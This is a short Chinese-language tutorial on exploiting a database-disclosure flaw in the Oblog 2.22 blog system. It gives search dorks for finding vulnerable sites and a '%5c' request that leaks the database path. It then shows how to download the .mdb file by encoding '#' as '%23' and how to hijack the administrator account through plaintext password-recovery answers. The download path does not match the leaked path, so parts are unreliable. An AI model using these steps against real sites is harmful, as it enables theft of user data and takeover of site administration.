A-A+
带#号的数据库-Oblog博客系统暴库
Oblog 是一款用户群非常多的博客系统,在其 Oblog 2.22 版中,存在着一个暴库漏洞,其漏洞原因与上面的两个程序是一样的,都是没有数据库连接文件的容错语句。
以“powered by Oblog ver2”或“inurl:(blog/index.asp?classid=)”为关键词进行搜索,可搜索到许多漏洞网站。
以其中的某个站点“http://www.abc.com/blog/index.asp”为例,进行测试。打开一个文章链接“http://www.abc.com/blog/index.asp?classid=6”,页面正常显示。
然后使用 “%5c”暴库法,提交链接为:
http://www.abc.com/blog%5cindex.asp?classid=6
顺利地报出数据库信息为
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'c:\blog\data\oblog#chenchen19.mdb'。
/blog/data/conn.asp,行 4
由此得到数据库的路径,但是数据库文件名中带有一个特殊的字符“#”,在IE中提交后无法进行下载。由于下载的时候只能识别“#”号前面的部分,对于后面的字符自动去掉,所以造成文件名出错,无法正常下载。此时,可以将“#”号换为 utf8 编码 “%23”,提交“http://www.abc.com/oblog/data/%23chenchen19.mdb”即可下载数据库了。
下载数据库后,数据库中的管理员帐号和一般用户的密码都是经过 MD5 加密过的,破解起来比较麻烦,但是数据库“users”表中的密码找回答案是未加密的,可以利用密码找回功能,重新修改管理员密码。